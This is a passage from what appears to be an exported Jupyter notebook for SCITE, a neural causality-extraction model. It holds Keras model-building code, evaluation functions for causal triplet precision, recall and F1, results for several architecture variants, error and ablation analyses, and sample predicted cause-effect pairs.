char_emb = TimeDistributed(
Lambda(lambda x: K.max(x, axis=1)), name="MAX_POOLING")(char_emb)
input_node.append(char_seq)
emb = concatenate([emb, char_emb], axis=-1, name='EMB_CHAR')
if args.backbone == 'lstm':
dec = Bidirectional(LSTM(args.lstm_size,
kernel_initializer=self.kernel_initializer,
recurrent_initializer=self.recurrent_initializer,
dropout=args.dropout_rate,
recurrent_dropout=args.dropout_rate,
implementation=2,
return_sequences=True),
merge_mode='concat', name='BiLSTM-1')(emb)
'''
enc_bilstm = Bidirectional(LSTM(args.lstm_size,
kernel_initializer=self.kernel_initializer,
recurrent_initializer=self.recurrent_initializer,
dropout=args.dropout_rate,
recurrent_dropout=args.dropout_rate,
implementation=2,
return_sequences=True),
merge_mode='concat', name='BiLSTM-1')(emb)
dec = Bidirectional(LSTM(args.lstm_size,
kernel_initializer=self.kernel_initializer,
recurrent_initializer=self.recurrent_initializer,
dropout=args.dropout_rate,
recurrent_dropout=args.dropout_rate,
implementation=2,
return_sequences=True),
merge_mode='concat', name='BiLSTM-2')(enc_bilstm)
'''
if args.use_att:
mhsa = MultiHeadSelfAttention(
head_num=args.nb_head, size_per_head=args.size_per_head, kernel_initializer=self.kernel_initializer, name='MHSA')(dec)
dec = concatenate(
[dec, mhsa], axis=-1, name='CONTEXT')
if args.backbone == 'cnn':
conv_1 = self.conv_block(
emb, dilation_rate=DILATION_RATE[0], name='1')
conv_2 = self.conv_block(
conv_1, dilation_rate=DILATION_RATE[1], name='2')
conv_3 = self.conv_block(
conv_2, dilation_rate=DILATION_RATE[2], name='3')
dec = self.conv_block(conv_3, dilation_rate=DILATION_RATE[-1],
use_dropout=False, name='4')
if args.classifier == 'softmax':
output = TimeDistributed(Dense(NUM_CLASS, activation='softmax',
kernel_initializer=self.kernel_initializer), name='DENSE')(dec)
loss_func = 'sparse_categorical_crossentropy'
if args.classifier == 'crf':
dense = TimeDistributed(Dense(
NUM_CLASS, activation=None, kernel_initializer=self.kernel_initializer), name='DENSE')(dec)
crf = ChainCRF(init=self.kernel_initializer, name='CRF')
output = crf(dense)
loss_func = crf.sparse_loss
optimizer = optimizers.Nadam(lr=self.lr, clipnorm=args.clip_norm)
model = Model(inputs=input_node, outputs=output)
model.compile(loss=loss_func, optimizer=optimizer)
return model
parser = argparse.ArgumentParser()
parser.add_argument('-fp', '--file_path', type=str, default="your path to /data/", help="")
parser.add_argument('-s', '--seed', type=int, default=666, help="")
parser.add_argument('-kf', '--k_fold', type=int, default=0)
parser.add_argument('-cuda', '--cuda_devices', type=int, default=1)
parser.add_argument('-cpu', '--cpu_core', type=int, default=1)
parser.add_argument('-cse', '--use_flair', type=bool, default=True, help="")
parser.add_argument('-chr', '--char_emb', type=str, default="cnn", help="lstm or cnn or None")
parser.add_argument('-b', '--backbone', type=str, default="lstm", help="lstm or cnn")
parser.add_argument('-ls', '--lstm_size', type=int, default=256, help="")
parser.add_argument('-dp', '--dropout_rate', type=float, default=0.5, help="")
parser.add_argument('-att', '--use_att', type=bool, default=True, help="")
parser.add_argument('-nh', '--nb_head', type=int, default=3, help="")
parser.add_argument('-hs', '--size_per_head', type=int, default=8, help="")
parser.add_argument('-lr', '--learning_rate', type=float, default=0.002, help="")
parser.add_argument('-cl', '--classifier', type=str, default="crf", help="softmax or crf")
parser.add_argument('-cn', '--clip_norm', type=float, default=5.0, help="")
parser.add_argument('-n', '--num_epochs', type=int, default=200, help="")
parser.add_argument('-bs', '--batch_size', type=int, default=16, help="")
args = parser.parse_args()
args.file_path = 'your path to /data/'
data = Data(args)
extractor = CausalityExtractor(args)
model = extractor.slm(data)
model.summary()
def compute_f1(tp, ap, pp):
pre = tp / float(pp) if pp != 0 else 0
rec = tp / float(ap) if ap != 0 else 0
f1 = 2 * pre * rec / float(pre + rec) if (pre + rec) != 0 else 0
return pre, rec, f1
def load_pred(path):
model.load_weights(path)
test_generator = DataGenerator([i for i in range(len(data.xTest))],
x=data.xTest,
x_flair=data.test_flair,
x_char=data.test_char,
y=data.yTest,
batch_size=args.batch_size,
classifier=args.classifier,
pred=True)
return np.argmax(model.predict_generator(test_generator), axis=-1)[:len(data.xTest)]
def evaluation_ctl(path=None, show=False):
"""
Compute precision, recall and f1-score for causal triplet labeling
"""
if path:
y_pred = load_pred(path=path)
else:
y_pred = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
y_true = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
pp1, pp2, pp3, pp4, pp5, pp6 = 0, 0, 0, 0, 0, 0
tp1, tp2, tp3, tp4, tp5, tp6 = 0, 0, 0, 0, 0, 0
ap1, ap2, ap3, ap4, ap5, ap6 = 236, 229, 238, 230, 9, 16
for i, yp in enumerate(y_pred):
yt = y_true[i]
for j in range(len(y_true[i])):
if yp[j] == 1:
pp1 += 1
if yt[j] == 1:
tp1 += 1
if yp[j] == 2:
pp2 += 1
if yt[j] == 2:
tp2 += 1
if yp[j] == 3:
pp3 += 1
if yt[j] == 3:
tp3 += 1
if yp[j] == 4:
pp4 += 1
if yt[j] == 4:
tp4 += 1
if yp[j] == 5:
pp5 += 1
if yt[j] == 5:
tp5 += 1
if yp[j] == 6:
pp6 += 1
if yt[j] == 6:
tp6 += 1
#return y_pred
#pp, tp, sc, se = 0, 0, 0, 0
pp, tp = 0, 0
#return [final_result(yp, [data.index2word[w] for w in data.xTest[i] if w != 0]) for i, yp in enumerate(y_pred)]
for i, yp in enumerate(y_pred):
yp_idx = final_result(
yp, [data.index2word[w] for w in data.xTest[i] if w != 0])
if yp_idx != 0:
pp += len(yp_idx)
if data.y_true_idx[i] != 0:
y_true_Cause = [[data.index2word[data.xTest[i][idx]]
for idx in m[0]] for m in data.y_true_idx[i]]
y_true_Effect = [[data.index2word[data.xTest[i][idx]]
for idx in m[-1]] for m in data.y_true_idx[i]]
y_true_Triplet = [(y_true_Cause[i], y_true_Effect[i])
for i in range(len(y_true_Cause))]
log_c, log_e = [], []
for m in data.y_true_idx[i]:
y_true_cause = [
data.index2word[data.xTest[i][idx]] for idx in m[0]]
y_true_effect = [
data.index2word[data.xTest[i][idx]] for idx in m[-1]]
for n in yp_idx:
y_pred_cause = [data.index2word[data.xTest[i][idx]]
for idx in n[0] if data.xTest[i][idx] != 0]
y_pred_effect = [data.index2word[data.xTest[i][idx]]
for idx in n[-1] if data.xTest[i][idx] != 0]
if y_true_cause == y_pred_cause and y_true_effect == y_pred_effect:
tp += 1
#if y_true_cause == y_pred_cause and y_true_effect != y_pred_effect and (y_pred_cause, y_pred_effect) not in y_true_Triplet:#+log_c:
#if y_true_effect != y_pred_effect and (y_pred_cause, y_pred_effect) not in y_true_Triplet+log_c:
# if (n[0], n[-1]) not in log_c:
# sc += 1
# log_c.append((n[0], n[-1]))
#log_c.append((y_pred_cause, y_pred_effect))
#if y_true_cause != y_pred_cause and y_true_effect == y_pred_effect and (y_pred_cause, y_pred_effect) not in y_true_Triplet:#+log_e:
#if y_true_cause != y_pred_cause and (y_pred_cause, y_pred_effect) not in y_true_Triplet+log_e:
# if (n[0], n[-1]) not in log_e:
# se += 1
# log_e.append((n[0], n[-1]))
#log_e.append((y_pred_cause, y_pred_effect))
pre, rec, f1 = compute_f1(tp, data.ap, pp)
#pre1, rec1, f11 = compute_f1(tp1, ap1, pp1)
#pre2, rec2, f12 = compute_f1(tp2, ap2, pp2)
#pre3, rec3, f13 = compute_f1(tp3, ap3, pp3)
#pre4, rec4, f14 = compute_f1(tp4, ap4, pp4)
#pre5, rec5, f15 = compute_f1(tp5, ap5, pp5)
#pre6, rec6, f16 = compute_f1(tp6, ap6, pp6)
preC, recC, f1C = compute_f1(tp1+tp2, ap1+ap2, pp1+pp2)
preE, recE, f1E = compute_f1(tp3+tp4, ap3+ap4, pp3+pp4)
preEmb, recEmb, f1Emb = compute_f1(tp5+tp6, ap5+ap6, pp5+pp6)
#print(tp1, tp2, ap1, ap2, pp1, pp2)
#scr = sc / float(data.ap)
#scr = sc / float(pp)
#ser = se / float(data.ap)
#ser = se / float(pp)
#print('Triplet: pre: %.4f' % pre, ' rec: %.4f' % rec, ' f1: %.4f' % f1)
#print('B-C: pre: %.4f' % pre1, ' rec: %.4f' % rec1, ' f1: %.4f' % f11)
#print('I-C: pre: %.4f' % pre2, ' rec: %.4f' % rec2, ' f1: %.4f' % f12)
#print('B-E: pre: %.4f' % pre3, ' rec: %.4f' % rec3, ' f1: %.4f' % f13)
#print('I-E: pre: %.4f' % pre4, ' rec: %.4f' % rec4, ' f1: %.4f' % f14)
#print('B-Emb: pre: %.4f' % pre5, ' rec: %.4f' % rec5, ' f1: %.4f' % f15)
#print('I-Emb: pre: %.4f' % pre6, ' rec: %.4f' % rec6, ' f1: %.4f' % f16)
#print('single-cause: %.4f' % scr, ' single-effect: %.4f' % ser)
#return pre, rec, f1, pre1, rec1, f11, pre2, rec2, f12, pre3, rec3, f13, pre4, rec4, f14, pre5, rec5, f15, pre6, rec6, f16, scr, ser
if show:
print('Triplet: pre: %.4f' % pre, ' rec: %.4f' % rec, ' f1: %.4f' % f1)
print('C: pre: %.4f' % preC, ' rec: %.4f' % recC, ' f1: %.4f' % f1C)
print('E: pre: %.4f' % preE, ' rec: %.4f' % recE, ' f1: %.4f' % f1E)
print('Emb: pre: %.4f' % preEmb, ' rec: %.4f' % recEmb, ' f1: %.4f' % f1Emb)
#print('single-cause: %.4f' % scr, ' single-effect: %.4f' % ser)
return pre, rec, f1, preC, recC, f1C, preE, recE, f1E, preEmb, recEmb, f1Emb
def evaluation_ctl_distance(path=None, show=False, mode="1"):
"""
Compute precision, recall and f1-score for causal triplet labeling
"""
if path:
y_pred = load_pred(path=path)
else:
y_pred = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
y_true = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
ap, pp, tp = 0, 0, 0
if mode == "1":
minD = 0
maxD = 5
if mode == "2":
minD = 6
maxD = 10
if mode == "3":
minD = 11
maxD = MAX_WLEN
if mode == "4":
minD = 0
maxD = MAX_WLEN
'''
if mode == "1":
minD = 0
maxD = 4
if mode == "2":
minD = 5
maxD = 6
if mode == "3":
minD = 7
maxD = 9
if mode == "4":
minD = 10
maxD = MAX_WLEN
if mode == "5":
minD = 0
maxD = MAX_WLEN
'''
for i, yp in enumerate(y_pred):
if data.y_true_idx[i] != 0:
ap += len([k for k in [max(sum(j, []))-min(sum(j, [])) for j in data.y_true_idx[i]] if k <= maxD and k >= minD])
yp_idx = final_result(
yp, [data.index2word[w] for w in data.xTest[i] if w != 0])
if yp_idx != 0:
pp += len([k for k in [max(sum(j, []))-min(sum(j, [])) for j in yp_idx] if k <= maxD and k >= minD])
if data.y_true_idx[i] != 0:
for m in data.y_true_idx[i]:
if max(sum(m, []))-min(sum(m, [])) <= maxD and max(sum(m, []))-min(sum(m, [])) >= minD:
y_true_cause = [
data.index2word[data.xTest[i][idx]] for idx in m[0]]
y_true_effect = [
data.index2word[data.xTest[i][idx]] for idx in m[-1]]
for n in yp_idx:
if max(sum(n, []))-min(sum(n, [])) <= maxD and max(sum(n, []))-min(sum(n, [])) >= minD:
y_pred_cause = [data.index2word[data.xTest[i][idx]]
for idx in n[0] if data.xTest[i][idx] != 0]
y_pred_effect = [data.index2word[data.xTest[i][idx]]
for idx in n[-1] if data.xTest[i][idx] != 0]
if y_true_cause == y_pred_cause and y_true_effect == y_pred_effect:
tp += 1
pre, rec, f1 = compute_f1(tp, ap, pp)
if show:
print('Triplet: pre: %.4f' % pre, ' rec: %.4f' % rec, ' f1: %.4f' % f1)
return tp, ap, pp
return pre, rec, f1
def evaluation_ctl_ea(path=None):
if path:
y_pred = load_pred(path=path)
else:
y_pred = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
y_true = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
c2e, c2emb, c2o = 0, 0, 0
e2c, e2emb, e2o = 0, 0, 0
emb2c, emb2e, emb2o = 0, 0, 0
o2c, o2e, o2emb = 0, 0, 0
for i, yp in enumerate(y_pred):
yt = y_true[i]
for j in range(len(y_true[i])):
if yt[j] in [1, 2]:
if yp[j] in [3, 4]:
c2e += 1
if yp[j] in [5, 6]:
c2emb += 1
if yp[j] == 0:
c2o += 1
if yt[j] in [3, 4]:
if yp[j] in [1, 2]:
e2c += 1
if yp[j] in [5, 6]:
e2emb += 1
if yp[j] == 0:
e2o += 1
if yt[j] in [5, 6]:
if yp[j] in [1, 2]:
emb2c += 1
if yp[j] in [3, 4]:
emb2e += 1
if yp[j] == 0:
emb2o += 1
if yt[j] == 0:
if yp[j] in [1, 2]:
o2c += 1
if yp[j] in [3, 4]:
o2e += 1
if yp[j] in [5, 6]:
o2emb += 1
return c2e, c2emb, c2o, e2c, e2emb, e2o, emb2c, emb2e, emb2o, o2c, o2e, o2emb
def sprint_distance(fileName, mode="1"):
pre, rec, f1 = [], [], []
fileName = [fileName+i for i in sum([i[-1] for i in os.walk(fileName)], [])]
for fn in fileName:
_ = evaluation_ctl(fn, mode=mode)
pre.append(_[0]), rec.append(_[1]), f1.append(_[2]);
print('Triplet: pre: %.4f±%.4f' % (np.mean(pre), np.std(pre)), ' rec: %.4f±%.4f' % (np.mean(rec), np.std(rec)), ' f1: %.4f±%.4f' % (np.mean(f1), np.std(f1)))
def sprint_ea(fileName):
c2e, c2emb, c2o, e2c, e2emb, e2o, emb2c, emb2e, emb2o, o2c, o2e, o2emb = [], [], [], [], [], [], [], [], [], [], [], []
fileName = [fileName+i for i in sum([i[-1] for i in os.walk(fileName)], [])]
for fn in fileName:
_ = evaluation_ctl_ea(fn)
c2e.append(_[0]), c2emb.append(_[1]), c2o.append(_[2]);
e2c.append(_[3]), e2emb.append(_[4]), e2o.append(_[5]);
emb2c.append(_[6]), emb2e.append(_[7]), emb2o.append(_[8]);
o2c.append(_[9]), o2e.append(_[10]), o2emb.append(_[11]);
#print(' C E Emb O')
#print('C - %.2f %.2f %.2f' % (np.mean(e2c[-1]), np.mean(emb2c[-1]), np.mean(o2c[-1])))
#print('E %.2f - %.2f %.2f' % (np.mean(c2e[-1]), np.mean(emb2e[-1]), np.mean(o2e[-1])))
#print('Emb %.2f %.2f - %.2f' % (np.mean(c2emb[-1]), np.mean(e2emb[-1]), np.mean(o2emb[-1])))
#print('O %.2f %.2f %.2f -' % (np.mean(c2o[-1]), np.mean(e2o[-1]), np.mean(emb2o[-1])))
print(' C E Emb O')
print('C - %.2f %.2f %.2f' % (np.mean(e2c), np.mean(emb2c), np.mean(o2c)))
print('E %.2f - %.2f %.2f' % (np.mean(c2e), np.mean(emb2e), np.mean(o2e)))
print('Emb %.2f %.2f - %.2f' % (np.mean(c2emb), np.mean(e2emb), np.mean(o2emb)))
print('O %.2f %.2f %.2f -' % (np.mean(c2o), np.mean(e2o), np.mean(emb2o)))
return c2e, c2emb, c2o, e2c, e2emb, e2o, emb2c, emb2e, emb2o, o2c, o2e, o2emb
def mhsa_analysis(fileName):
#for m in [1, 2, 3, 4, 5]:
for m in [1, 2, 3, 4]:
sprint_distance(fileName, mode=str(m))
def sprint(fileName, tag=False):
pre, rec, f1 = [], [], []
preC, recC, f1C = [], [], []
preE, recE, f1E = [], [], []
preEmb, recEmb, f1Emb = [], [], []
#scr, ser = [], []
fileName = [fileName+i for i in sum([i[-1] for i in os.walk(fileName)], [])]
for fn in fileName:
_ = evaluation_ctl(fn)
pre.append(_[0]), rec.append(_[1]), f1.append(_[2]);
preC.append(_[3]), recC.append(_[4]), f1C.append(_[5]);
preE.append(_[6]), recE.append(_[7]), f1E.append(_[8]);
preEmb.append(_[9]), recEmb.append(_[10]), f1Emb.append(_[11]);
#scr.append(_[-2]), ser.append(_[-1]);
print('Triplet: pre: %.4f±%.4f' % (np.mean(pre), np.std(pre)), ' rec: %.4f±%.4f' % (np.mean(rec), np.std(rec)), ' f1: %.4f±%.4f' % (np.mean(f1), np.std(f1)))
if tag:
print('C: pre: %.4f±%.4f' % (np.mean(preC), np.std(preC)), ' rec: %.4f±%.4f' % (np.mean(recC), np.std(recC)), ' f1: %.4f±%.4f' % (np.mean(f1C), np.std(f1C)))
print('E: pre: %.4f±%.4f' % (np.mean(preE), np.std(preE)), ' rec: %.4f±%.4f' % (np.mean(recE), np.std(recE)), ' f1: %.4f±%.4f' % (np.mean(f1E), np.std(f1E)))
print('Emb: pre: %.4f±%.4f' % (np.mean(preEmb), np.std(preEmb)), ' rec: %.4f±%.4f' % (np.mean(recEmb), np.std(recEmb)), ' f1: %.4f±%.4f' % (np.mean(f1Emb), np.std(f1Emb)))
#print('single-cause: %.4f±%.4f' % (np.mean(scr), np.std(scr)), ' single-effect: %.4f±%.4f' % (np.mean(ser), np.std(ser)))
def predict(path=None):
"""
Print predict causal triplets
"""
if path:
y_pred = load_pred(path=path)
else:
y_pred = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
y_true = data.yTest.reshape(data.yTest.shape[0], MAX_WLEN)
flag = 1
for i, yp in enumerate(y_pred):
yp_idx = final_result(
yp, [data.index2word[w] for w in data.xTest[i] if w != 0])
if data.y_true_idx[i] != 0 and 5 not in y_true[i]:
print('------------------')
print('Sentence-%.3d' % flag,
' '.join([data.index2word[w] for w in data.xTest[i] if w != 0]))
y_true_Cause = [[data.index2word[data.xTest[i][idx]]
for idx in m[0]] for m in data.y_true_idx[i]]
y_true_Effect = [[data.index2word[data.xTest[i][idx]]
for idx in m[-1]] for m in data.y_true_idx[i]]
print([(y_true_Cause[i], y_true_Effect[i])
for i in range(len(y_true_Cause))])
if yp_idx != 0:
y_pred_Cause = [[data.index2word[data.xTest[i][idx]]
for idx in n[0] if data.xTest[i][idx] != 0] for n in yp_idx]
y_pred_Effect = [[data.index2word[data.xTest[i][idx]]
for idx in n[-1] if data.xTest[i][idx] != 0] for n in yp_idx]
print([(y_pred_Cause[i], y_pred_Effect[i])
for i in range(len(y_pred_Cause))])
else:
print([])
flag += 1
###Output
_____no_output_____
###Markdown
Main Results IDCNN-Softmax
###Code
sprint('your path to /FLAIR-False_CHAR-None_CNN_MHSA-False_SOFTMAX/test/')
###Output
Triplet: pre: 0.7455±0.0142 rec: 0.7074±0.0168 f1: 0.7258±0.0105
###Markdown
IDCNN-CRF
###Code
sprint('your path to /FLAIR-False_CHAR-None_CNN_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.7442±0.0225 rec: 0.7142±0.0122 f1: 0.7288±0.0160
###Markdown
BiLSTM-Softmax
###Code
sprint('your path to /FLAIR-False_CHAR-None_LSTM_MHSA-False_SOFTMAX/test/')
###Output
Triplet: pre: 0.7744±0.0183 rec: 0.7622±0.0114 f1: 0.7682±0.0138
###Markdown
CLSTM-BiLSTM-CRF
###Code
sprint('your path to /FLAIR-False_CHAR-lstm_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.8144±0.0284 rec: 0.7412±0.0073 f1: 0.7757±0.0107
###Markdown
CCNN-BiLSTM-CRF
###Code
sprint('your path to /FLAIR-False_CHAR-cnn_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.8069±0.0199 rec: 0.7520±0.0227 f1: 0.7780±0.0075
###Markdown
BiLSTM-CRF
###Code
sprint('your path to /FLAIR-False_CHAR-None_LSTM_MHSA-False_CRF/test/', tag=True)
###Output
Triplet: pre: 0.7837±0.0061 rec: 0.7932±0.0087 f1: 0.7884±0.0072
C: pre: 0.8810±0.0070 rec: 0.8628±0.0094 f1: 0.8718±0.0076
E: pre: 0.8928±0.0037 rec: 0.8897±0.0040 f1: 0.8913±0.0031
Emb: pre: 0.4343±0.1899 rec: 0.0960±0.0320 f1: 0.1567±0.0551
###Markdown
BERT-BiLSTM-CRF
###Code
sprint('your path to /logs/BERT-True-s_CHAR-None_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.8277±0.0058 rec: 0.8209±0.0093 f1: 0.8243±0.0049
###Markdown
Flair+CLSTM-BiLSTM-CRF
###Code
sprint('your path to /logs/FLAIR-True_CHAR-lstm_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.8403±0.0090 rec: 0.8284±0.0125 f1: 0.8343±0.0106
###Markdown
ELMo-BiLSTM-CRF
###Code
sprint('your path to /logs/ELMO-True_CHAR-None_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.8361±0.0135 rec: 0.8399±0.0063 f1: 0.8379±0.0092
###Markdown
Flair-BiLSTM-CRF
###Code
sprint('your path to /logs/FLAIR-True_CHAR-None_LSTM_MHSA-False_CRF/test/', tag=True)
###Output
Triplet: pre: 0.8414±0.0079 rec: 0.8351±0.0141 f1: 0.8382±0.0092
C: pre: 0.8995±0.0091 rec: 0.8843±0.0142 f1: 0.8917±0.0073
E: pre: 0.9294±0.0062 rec: 0.8885±0.0075 f1: 0.9084±0.0030
Emb: pre: 0.8556±0.1975 rec: 0.1360±0.0784 f1: 0.2197±0.1027
###Markdown
SCITE
###Code
sprint('your path to /logs/FLAIR-True_CHAR-cnn_LSTM_MHSA-True_CRF/test/', tag=True)
###Output
Triplet: pre: 0.8333±0.0042 rec: 0.8581±0.0021 f1: 0.8455±0.0028
C: pre: 0.8999±0.0079 rec: 0.8998±0.0044 f1: 0.8998±0.0018
E: pre: 0.9272±0.0073 rec: 0.9021±0.0090 f1: 0.9144±0.0055
Emb: pre: 0.8489±0.2165 rec: 0.1920±0.1085 f1: 0.2947±0.1477
###Markdown
Error Analysis BiLSTM-CRF
###Code
sprint_ea('your path to /logs/FLAIR-False_CHAR-None_LSTM_MHSA-False_CRF/test/')
###Output
C E Emb O
C - 0.00 10.00 37.60
E 3.40 - 12.20 30.60
Emb 1.40 1.60 - 0.40
O 52.40 46.20 0.40 -
###Markdown
Flair-BiLSTM-CRF
###Code
sprint_ea('your path to /FLAIR-True_CHAR-None_LSTM_MHSA-False_CRF/test/')
###Output
C E Emb O
C - 0.00 10.00 30.60
E 0.00 - 11.60 16.40
Emb 0.40 0.80 - 0.00
O 48.00 47.80 0.00 -
###Markdown
SCITE
###Code
sprint_ea('your path to /FLAIR-True_CHAR-cnn_LSTM_MHSA-True_CRF/test/')
###Output
C E Emb O
C - 0.00 7.80 34.40
E 1.00 - 12.40 16.20
Emb 0.00 1.40 - 0.00
O 41.20 40.80 0.00 -
###Markdown
Ablation Analysis Flair-BiLSTM-MHSA-CRF
###Code
sprint('your path to /FLAIR-True_CHAR-None_LSTM_MHSA-True-24_CRF/test/')
###Output
Triplet: pre: 0.8269±0.0114 rec: 0.8615±0.0077 f1: 0.8438±0.0090
###Markdown
BiLSTM-MHSA-CRF
###Code
sprint('your path to /FLAIR-False_CHAR-None_LSTM_MHSA-True_CRF/test/')
###Output
Triplet: pre: 0.8014±0.0043 rec: 0.8264±0.0070 f1: 0.8137±0.0051
###Markdown
Analysis of MHSA First Group BiLSTM-CRF
###Code
mhsa_analysis('your path to /FLAIR-False_CHAR-None_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.8748±0.0059 rec: 0.9160±0.0053 f1: 0.8949±0.0048
Triplet: pre: 0.7415±0.0111 rec: 0.7484±0.0091 f1: 0.7450±0.0096
Triplet: pre: 0.6548±0.0090 rec: 0.6122±0.0365 f1: 0.6324±0.0227
Triplet: pre: 0.7837±0.0061 rec: 0.7932±0.0087 f1: 0.7884±0.0072
###Markdown
BiLSTM-MHSA-CRF
###Code
mhsa_analysis('your path to /FLAIR-False_CHAR-None_LSTM_MHSA-True_CRF/test/')
###Output
Triplet: pre: 0.8990±0.0083 rec: 0.9277±0.0114 f1: 0.9131±0.0092
Triplet: pre: 0.7587±0.0087 rec: 0.7906±0.0134 f1: 0.7743±0.0073
Triplet: pre: 0.6747±0.0503 rec: 0.6735±0.0428 f1: 0.6737±0.0436
Triplet: pre: 0.8014±0.0043 rec: 0.8264±0.0070 f1: 0.8137±0.0051
###Markdown
Second Group Flair-BiLSTM-CRF
###Code
mhsa_analysis('your path to /FLAIR-True_CHAR-None_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.8970±0.0073 rec: 0.9210±0.0041 f1: 0.9088±0.0034
Triplet: pre: 0.8272±0.0116 rec: 0.8156±0.0255 f1: 0.8212±0.0171
Triplet: pre: 0.7236±0.0257 rec: 0.6694±0.0153 f1: 0.6950±0.0114
Triplet: pre: 0.8414±0.0079 rec: 0.8351±0.0141 f1: 0.8382±0.0092
###Markdown
Flair-BiLSTM-MHSA-CRF
###Code
mhsa_analysis('your path to /FLAIR-True_CHAR-None_LSTM_MHSA-True-24_CRF/test/')
###Output
Triplet: pre: 0.8981±0.0156 rec: 0.9328±0.0159 f1: 0.9151±0.0153
Triplet: pre: 0.8055±0.0193 rec: 0.8453±0.0058 f1: 0.8248±0.0103
Triplet: pre: 0.7105±0.0160 rec: 0.7306±0.0200 f1: 0.7203±0.0152
Triplet: pre: 0.8269±0.0114 rec: 0.8615±0.0077 f1: 0.8438±0.0090
###Markdown
Third Group Flair+CCNN-BiLSTM-CRF
###Code
mhsa_analysis('your path to /FLAIR-True_CHAR-cnn_LSTM_MHSA-False_CRF/test/')
###Output
Triplet: pre: 0.9067±0.0056 rec: 0.9143±0.0034 f1: 0.9105±0.0032
Triplet: pre: 0.8156±0.0161 rec: 0.8016±0.0245 f1: 0.8084±0.0187
Triplet: pre: 0.7549±0.0474 rec: 0.6776±0.0327 f1: 0.7126±0.0201
Triplet: pre: 0.8435±0.0034 rec: 0.8264±0.0143 f1: 0.8348±0.0065
###Markdown
SCITE
###Code
mhsa_analysis('your path to /FLAIR-True_CHAR-cnn_LSTM_MHSA-True_CRF/test/')
###Output
Triplet: pre: 0.9039±0.0075 rec: 0.9328±0.0141 f1: 0.9181±0.0088
Triplet: pre: 0.8134±0.0118 rec: 0.8375±0.0091 f1: 0.8253±0.0096
Triplet: pre: 0.7060±0.0398 rec: 0.7224±0.0356 f1: 0.7139±0.0353
Triplet: pre: 0.8333±0.0042 rec: 0.8581±0.0021 f1: 0.8455±0.0028
###Markdown
Case Study 1-175
###Code
predict('your path to /FLAIR-True_CHAR-cnn_LSTM_MHSA-True_CRF/test/6_{96}.hdf5')
predict('your path to /FLAIR-True_CHAR-None_LSTM_MHSA-False_CRF/test/6_{115}.hdf5')
predict('your path to /FLAIR-False_CHAR-None_LSTM_MHSA-False_CRF/test/6_{198}.hdf5')
###Output
------------------
Sentence-001 Cold sores or fever blisters are caused by the herpes simplex virus and are usually relatively easy to identify
[(['the', 'herpes', 'simplex', 'virus'], ['Cold', 'sores']), (['the', 'herpes', 'simplex', 'virus'], ['fever', 'blisters'])]
[(['the', 'herpes', 'simplex', 'virus'], ['Cold', 'sores']), (['the', 'herpes', 'simplex', 'virus'], ['fever', 'blisters'])]
------------------
Sentence-002 Fog , rain , darkness , and or blowing snow lead to disorientation
[(['Fog'], ['disorientation']), (['rain'], ['disorientation']), (['darkness'], ['disorientation']), (['blowing', 'snow'], ['disorientation'])]
[(['Fog'], ['disorientation']), (['rain'], ['disorientation']), (['darkness'], ['disorientation']), (['blowing', 'snow'], ['disorientation'])]
------------------
Sentence-003 Aware of the suffering caused by unmindful drinking , I am committed to cultivate good health , both physical and mental , for myself , my family , and my society
[(['unmindful', 'drinking'], ['the', 'suffering'])]
[(['unmindful', 'drinking'], ['the', 'suffering'])]
------------------
Sentence-004 Information about the foodborne illness caused by salmonella bacteria
[(['salmonella', 'bacteria'], ['the', 'foodborne', 'illness'])]
[(['salmonella', 'bacteria'], ['the', 'foodborne', 'illness'])]
------------------
Sentence-005 This is one of the more common causes of hair loss caused by stress and when you are losing hair because of this your hair stops growing and lies dormant
[(['stress'], ['hair', 'loss'])]
[(['stress'], ['hair', 'loss'])]
------------------
Sentence-006 The storm resulted in 31 deaths and 2 5 million dollars damage
[(['The', 'storm'], ['31', 'deaths']), (['The', 'storm'], ['2', '5', 'million', 'dollars', 'damage'])]
[(['The', 'storm'], ['31', 'deaths']), (['The', 'storm'], ['dollars', 'damage'])]
------------------
Sentence-007 Bed sores are caused by pressure , which cuts off blood flow to parts of the body
[(['pressure'], ['Bed', 'sores'])]
[(['pressure'], ['Bed', 'sores'])]
------------------
Sentence-008 My problem is that the advertisement gives the impression that women in rural Bangladesh have 6 children
[(['the', 'advertisement'], ['the', 'impression'])]
[(['the', 'advertisement'], ['the', 'impression'])]
------------------
Sentence-009 Individual donors make a significant difference in addressing the suffering caused by the economic crisis
[(['the', 'economic', 'crisis'], ['the', 'suffering'])]
[(['the', 'economic', 'crisis'], ['a', 'significant', 'difference']), (['the', 'economic', 'crisis'], ['the', 'suffering'])]
------------------
Sentence-010 Overall , the fire after the earthquake burned out 7456 houses in over 530 localities
[(['the', 'earthquake'], ['the', 'fire'])]
[(['the', 'earthquake'], ['the', 'fire'])]
------------------
Sentence-011 A cancer survivor writes about the relatively rare occurrence of calcification of the breast after radiation therapy
[(['radiation', 'therapy'], ['calcification'])]
[]
------------------
Sentence-012 Zinc is essential for growth and cell division
[(['Zinc'], ['growth']), (['Zinc'], ['cell', 'division'])]
[]
------------------
Sentence-013 I too , get a headache from wine , and was always told that it was the sulfites
[(['wine'], ['a', 'headache'])]
[(['wine'], ['a', 'headache'])]
------------------
Sentence-014 Our country is resolving the war and poverty caused by the previous administration
[(['the', 'previous', 'administration'], ['the', 'war']), (['the', 'previous', 'administration'], ['poverty'])]
[(['the', 'previous', 'administration'], ['the', 'war']), (['the', 'previous', 'administration'], ['poverty'])]
------------------
Sentence-015 Like a catch-22 the worst part is that acne causes stress and stress triggers acne breakouts
[(['acne'], ['stress']), (['stress'], ['acne', 'breakouts'])]
[(['acne'], ['stress']), (['stress'], ['acne', 'breakouts'])]
------------------
Sentence-016 Sensitive pets experience rashes and discomfort from ticks and fleas
